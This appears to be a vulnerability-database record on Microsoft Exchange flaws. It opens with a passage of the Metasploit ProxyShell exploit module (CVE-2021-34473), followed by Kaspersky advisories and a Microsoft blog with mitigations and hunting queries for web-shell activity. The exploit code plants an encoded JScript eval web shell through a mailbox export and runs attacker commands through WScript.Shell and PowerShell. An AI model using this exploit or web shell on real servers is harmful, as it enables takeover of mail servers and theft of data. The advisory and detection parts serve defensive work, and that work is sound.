print_status(\"Saved mailbox and email address data to: #{stored_path}\")\n\n mailbox_table.rows.map(&:first)\n end\n\n def create_embedded_draft(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n print_status(\"Saving a draft email with subject '#{@draft_subject}' containing the attachment with the embedded webshell\")\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', 'Administrator')\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n exploit_setup\n\n create_embedded_draft(@mailbox_user_sid)\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = 
\"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+[\\w.-]+\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n successful = execute_powershell('New-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: @mailbox_user_email },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n fail_with(Failure::UnexpectedReply, 'The mailbox export request failed') unless successful\n\n exported = false\n print_status('Waiting for the export request to complete...')\n 30.times do\n sleep 5\n next unless send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200\n\n print_good('The mailbox export request has completed')\n exported = true\n break\n end\n\n fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in 
response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Identity', value: \"#{@mailbox_user_email}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n\n print_status('Removing the draft email')\n execute_powershell('Search-Mailbox', cat: @common_access_token, args: [\n { name: '-Identity', value: @mailbox_user_email },\n { name: '-SearchQuery', value: \"Subject:\\\"#{@draft_subject}\\\"\" },\n { name: '-Force' },\n { name: '-DeleteContent' }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\n# Use https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/resolvenames to resolve mailbox\n# information. The endpoint only returns 100 at a time though so if the target has more than that many email addresses\n# multiple requests will need to be made. 
Since the endpoint doesn't support pagination, we refine the query by using\n# progressively larger search prefixes until there are less than 101 results and thus will fit into a single response.\nclass MailboxEnumerator\n def initialize(mod)\n @mod = mod\n end\n\n # the characters that Exchange Server 2019 allows in an alias (no unicode)\n ALIAS_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\\'*+-/=?^_`{|}~'.freeze\n XML_NS = {\n 'm' => 'http://schemas.microsoft.com/exchange/services/2006/messages',\n 't' => 'http://schemas.microsoft.com/exchange/services/2006/types'\n }.freeze\n\n include Enumerable\n XMLTemplate = Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::XMLTemplate\n\n def each(name: 'SMTP:', &block)\n envelope = XMLTemplate.render('soap_getemails', name: name)\n res = @mod.send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n return unless res&.code == 200\n\n if res.get_xml_document.xpath('//m:ResolutionSet/@IncludesLastItemInRange', XML_NS).first&.text&.downcase == 'false'\n ALIAS_CHARSET.each_char do |char|\n each(name: name + char, &block)\n end\n else\n res.get_xml_document.xpath('//t:Mailbox', XML_NS).each do |mailbox|\n yield %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, XML_NS)&.text || '' }\n end\n end\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 
12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxyshell_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-08-11T23:35:12", "description": "### *Detect date*:\n09/30/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. 
Malicious users can exploit these vulnerabilities to gain privileges or execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2016 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2019 Cumulative Update 12 \nMicrosoft Exchange Server 2013 Cumulative Update 23\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) \n[CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2022-41040](<https://vulners.com/cve/CVE-2022-41040>) 5.0 Critical \n[CVE-2022-41082](<https://vulners.com/cve/CVE-2022-41082>) 5.0 Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5019758](<http://support.microsoft.com/kb/5019758>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "kaspersky", "title": "KLA19264 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T00:00:00", "id": "KLA19264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA19264/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:59:05", "description": "### *Detect date*:\n07/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges or obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31196](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31196>) \n[CVE-2021-34470](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34470>) \n[CVE-2021-31206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31206>) 
\n[CVE-2021-34473](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34473>) \n[CVE-2021-34523](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34523>) \n[CVE-2021-33766](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33766>) \n[CVE-2021-33768](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33768>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-31196](<https://vulners.com/cve/CVE-2021-31196>) 6.5 High \n[CVE-2021-34470](<https://vulners.com/cve/CVE-2021-34470>) 5.2 High \n[CVE-2021-31206](<https://vulners.com/cve/CVE-2021-31206>) 7.5 Critical \n[CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) 7.5 Critical \n[CVE-2021-33766](<https://vulners.com/cve/CVE-2021-33766>) 5.0 Critical \n[CVE-2021-33768](<https://vulners.com/cve/CVE-2021-33768>) 5.2 High\n\n### *KB list*:\n[5001779](<http://support.microsoft.com/kb/5001779>) \n[5004780](<http://support.microsoft.com/kb/5004780>) \n[5004778](<http://support.microsoft.com/kb/5004778>) \n[5004779](<http://support.microsoft.com/kb/5004779>) \n[5003611](<http://support.microsoft.com/kb/5003611>) \n[5003612](<http://support.microsoft.com/kb/5003612>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "kaspersky", "title": "KLA12224 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-30T00:00:00", "id": "KLA12224", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12224/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-10-07T17:04:51", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. 
\n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. 
Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. 
Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. 
It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess whether they can be removed without impacting performance, so as to ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections**| **MITRE ATT&CK Tactics observed** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>) \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>) \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) \n(the most robust defense from Microsoft Defender AV against 
this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence \n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution \n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. 
The following alerts could be related to this threat:\n\n**Indicators of attack******| **MITRE** **ATT&CK Tactics observed ** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack******| **MITRE ATT&CK Tactics observed ** \n---|--- \n'Chopper' malware was detected on an IIS Web server | Persistence \n'Chopper' high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. 
These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. 

The [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:

 * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>)
 * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>)
 * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>)
 * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>)
 * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>)

### Microsoft 365 Defender

To locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:

**Chopper web shell**

Use this query to hunt for Chopper web shell activity:

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "w3wp.exe"
| where ProcessCommandLine has_any ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo", "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")
```

**Suspicious files in Exchange directories**

Use this query to hunt for suspicious files in Exchange directories:

```kusto
DeviceFileEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName == "w3wp.exe"
| where FolderPath has "FrontEnd\\HttpProxy\\"
| where InitiatingProcessCommandLine contains "MSExchange"
| project FileName, FolderPath, SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp
```

## External attack surface management

### Microsoft Defender External Attack Surface Management

